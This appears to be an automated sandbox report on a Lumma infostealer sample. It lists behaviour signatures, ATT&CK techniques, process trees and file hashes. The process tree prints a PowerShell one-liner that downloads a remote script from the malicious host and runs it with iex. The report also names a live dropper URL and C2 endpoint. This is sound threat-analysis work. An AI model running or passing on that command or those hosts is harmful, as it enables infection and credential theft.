lumma | hxxps://dirol-netrol[.]com/poimi/toto[.]txt

Resubmissions

16-01-2025 22:34

250116-2hhp6ssrgj 10

16-01-2025 22:29

250116-2emjyssqfn 3

Analysis

max time kernel
431s
max time network
433s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-01-2025 22:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://dirol-netrol.com/poimi/toto.txt

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://dirol-netrol.com/poimi/toto.txt

Extracted

Family

lumma

https://foreigoiru.cyou/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 6 IoCs

flow	pid	Process
57	3156	PowerShell.exe
59	3156	PowerShell.exe
61	3156	PowerShell.exe
114	4648	PowerShell.exe
115	4648	PowerShell.exe
116	4648	PowerShell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3156	PowerShell.exe
4648	PowerShell.exe
3156	PowerShell.exe

Executes dropped EXE 4 IoCs

pid	Process
1940	soryte.exe
4508	soryte.exe
3320	soryte.exe
4500	soryte.exe

Loads dropped DLL 4 IoCs

pid	Process
1940	soryte.exe
4508	soryte.exe
3320	soryte.exe
4500	soryte.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	soryte.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	soryte.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	soryte.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	soryte.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
1296	msedge.exe
1296	msedge.exe
4804	msedge.exe
4804	msedge.exe
944	identity_helper.exe
944	identity_helper.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3156	PowerShell.exe
3156	PowerShell.exe
4648	PowerShell.exe
4648	PowerShell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3156	PowerShell.exe
Token: SeDebugPrivilege	4648	PowerShell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4804 wrote to memory of 2228	4804	msedge.exe	82
PID 4804 wrote to memory of 2228	4804	msedge.exe	82
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1564	4804	msedge.exe	83
PID 4804 wrote to memory of 1296	4804	msedge.exe	84
PID 4804 wrote to memory of 1296	4804	msedge.exe	84
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85
PID 4804 wrote to memory of 4636	4804	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://dirol-netrol.com/poimi/toto.txt
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff06ba46f8,0x7fff06ba4708,0x7fff06ba4718
  2⤵
  PID:2228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
  2⤵
  PID:1564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
  2⤵
  PID:4636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
  2⤵
  PID:1152
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
  2⤵
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
  2⤵
  PID:652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
  2⤵
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4560 /prefetch:1
  2⤵
  PID:3528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:3280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2168 /prefetch:1
  2⤵
  PID:2796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,8673291392328495663,11134844137770917325,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5296 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3284

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2000

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4388

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -command $uR='https://dirol-netrol.com/poimi/toto.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3156
- C:\ProgramData\golbus\soryte.exe
  "C:\ProgramData\golbus\soryte.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1940
- C:\ProgramData\golbus\soryte.exe
  "C:\ProgramData\golbus\soryte.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4508

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -command $uR='https://dirol-netrol.com/poimi/toto.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648
- C:\ProgramData\golbus\soryte.exe
  "C:\ProgramData\golbus\soryte.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3320
- C:\ProgramData\golbus\soryte.exe
  "C:\ProgramData\golbus\soryte.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\golbus\soryte.exe

Filesize
21KB

MD5
094e3d100ff3b088c886b96b5ed47d25

SHA1
c02bee1b4259c664b8ccbcf1376011349ba7e9c0

SHA256
e666c48de937578c9cc65f6f36806691a33ee63b12339df27975a570f8bb1bbd

SHA512
cdbace32e02be4e4d471e1c84b7011476631f304dcb3ebaa1a7068e34b7233bae43271fbfcde3b0ffb8964713756f68fcaa15f86d3f022be409dd4454a5ef7ea

Download Submit
C:\ProgramData\golbus\wincr.dll

Filesize
971KB

MD5
301110636d01147ed054b745f8f876f5

SHA1
a24dbad0b7433e823ac3b5d3f5388e689a97388e

SHA256
6e03be3d3a4c237e28f0245b93f11277185a69e28ffeb18f0791ea10c435fa98

SHA512
30ba95ac58b2af4ed8ede34ba60ba3e834ebc4c00fbfcd176d5991309659736e132c616d93b0514712206b6da35944cec12720f3eaf0497f17c10b6fc47f712e

Download Submit
C:\ProgramData\maram.zip

Filesize
298KB

MD5
b4ed18502d7b749815d5f4e7bd11c21f

SHA1
9b0fcdf44e0deaaea8ac045a268e7ddc98d5a101

SHA256
9e42c8e374fe89209d86682d12064e930966e5f43c88b0833c9b6bcc7a66052e

SHA512
8234c35b4596a4db5db36af694978bdaf9ac0062b3df0f32f322a527d4ef945ff3b1ae53574c26fcfbd7a090fd799b40cbb1faa4f24e21087b0b65d8824b73d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

Filesize
3KB

MD5
fe3aab3ae544a134b68e881b82b70169

SHA1
926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

SHA256
bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

SHA512
3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b8880802fc2bb880a7a869faa01315b0

SHA1
51d1a3fa2c272f094515675d82150bfce08ee8d3

SHA256
467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

SHA512
e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ba6ef346187b40694d493da98d5da979

SHA1
643c15bec043f8673943885199bb06cd1652ee37

SHA256
d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

SHA512
2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
184B

MD5
44b205a8755bc5ac252b26529b7ad2e4

SHA1
a06d0871dd6f707fb2ec5ed32c0b35052d550af8

SHA256
a47830aa9da064c6d77a2ec3b743fd897a091ce847010c2509cfe915160da7c7

SHA512
348e9f1e504bf9b3c7d3fe54f5fa18884b2802ad6eb99b76c9772bcdcf60796ca017b06011175b24426850d8b8fd539bea8615f32b0c374e0099e8c58d0ab22f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6a56c073d06784236cb4d293b38880dc

SHA1
544a95cd02461368d3c7b3da87ea67aa1130b8a0

SHA256
86524b3e9d5004ab21563bb3cc867069111d605ffd1738f8b00802a3e761f47c

SHA512
7bee961f53024bb42e25a63ff10d83aae39429e96d6f06bcbd2f5da482284756bb7d28430c9a81c4344ee626605074de9e0bf7ad81823dbe2ee03070e02e0375

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
dafd6bada2a68174f664f241ede065de

SHA1
fde9a8684a4bbd7bdd08a3872a87232df4a3c91e

SHA256
6db25c11967f3a2420c6ee5bb126cc84e737853a64823f3760bfb60efc6d9a86

SHA512
42f82b3a30506eb076867b9a06809f4c9bf82e37aadc61291091c96f338691d93550bf72a5fc3ae9f6929346b2b2d79f2a9dfdd9bbc34d499d3675f5b3870ae6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
70bea9bb1fa077f09481696342a3e565

SHA1
7710387f2abef65b3840a8baedc070fe127ba653

SHA256
705d28a236ae43e8e0b1eaba4683f84f4026df2f318e8ee71a85e191e358cf34

SHA512
06da2812d3e0e62ca4cd8b63c43c9c9efe9622c632fd434ab6af54662414048915b33fcb90811f6b5210c28ea3bf86f477273b1960aa0c28b7e562531dfe62e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
73e01e23cd5f1fdf2351fd6695e86444

SHA1
8ca13c704aeeee73323bb646d62d94407157361e

SHA256
e48afff094ce851b532f25c7bde3c8224724f1eb82addcfd24b50c7486865860

SHA512
05959457d81586c035d377aa861b9fecee714b28a7fa5237609bf7cca8b875d6a89862fc834999fc72b8549628a516a8ab91ff23be343c35c06cb5dfb46092ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9da1b6653ec12c1a9e1e4b9e7c7946de

SHA1
b3c284a2ef75e51cef3a707cffc6700275a52a1b

SHA256
8d3bdbe34b98be421838253e683ce0d58ab47083b1bcb6c58cfb0e7a61fa6807

SHA512
2630321cb6a13536285b3af75933b2a862dffcad765818ee668cb20e8361fc805a223a3c2ba6d3db923f334236aee1803a56bdb4f6af077f6e78badd77419eb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
7943837f2002e6ce1375d19341c95bf6

SHA1
b5d4f95548ba388e0a09ea4f75dee13c95812a61

SHA256
dc5ef2a282ddb6f33cfe1359355523a6b1b36d88b5b44f66a7dcdc4a3f1ba3cc

SHA512
d969d4fbd5b4a86897a9fc2740ee45d0738100ccaa15f1de4b0442b92ba4013e7f2539d9456164df7a7b60c9af6bc463086b55bf805c1f289d7cccc723401cf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
78757401f48a7933c63f8e2a00332580

SHA1
03270cd48ee9b7823596a646f333a49bda5a9ebc

SHA256
c61f4fd554e6f6445ed9c0c938e41fcc4e364e9a7d5ef16ca4b3bf9cc1085146

SHA512
82573ae5af23552ccd41314e12e4db92333c5d56de6281f4de8b8fa8b231ae6191cfbb145c8ac10b01f4ce534bc975af59809d5f0aea8b6eeee1913a3cae5b0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0b251117aef749a9c172d6a400cd0c0b

SHA1
01718068dfe29e34b2b4556cb787a59f7f8c40be

SHA256
89d9973b2c9794e7a416129fff52e6976ebd9e8d3d118d300648dfd91bd2153b

SHA512
ee8c81e4a5824de732bfa576fa1719dc816c08bad95bf6cb4acb756fb892f7f950c2e39594a8b5bc97d729db5fb5dc04c57ec4833b7cc8b9294244b298d96160

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2znczb3f.irc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
8b006a601a755564f841a7c636290058

SHA1
807a1a57fe17cbb5d67612bd2c2c012b611ba8bf

SHA256
9860d0810ded22085cb2e06effa2fae7b09e01bd6cea6cfb4a0d3ee65b9e164e

SHA512
20551d36999f5399e7ec274387037591b73c4fc0a42169d45e98a2e7a2fda34b2ee5b0609f7434266024640ac2e0810006388b0bf21c741f8680d9083fe764fa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
69e58254be3ecf7b3f0022dcbc462698

SHA1
5f2253d44c13b13a8b58915a5dcb847243402b9a

SHA256
4ea1abd46e356b2d556fdbdaadbeb7b962eb4961576dd54ea2a3896da35f2ee2

SHA512
6f262a9aa2e5722dd574beec969ed661c405df1cc9537f43652834670135fdfcc4200dec4dcb87c75749a1a6605b3988d69c09a1c9e4d910dd704c510b6bd116

Download Submit
memory/1940-188-0x0000000000C90000-0x0000000000CE7000-memory.dmp

Filesize
348KB

Download
memory/1940-193-0x0000000074FF0000-0x00000000750EA000-memory.dmp

Filesize
1000KB

Download
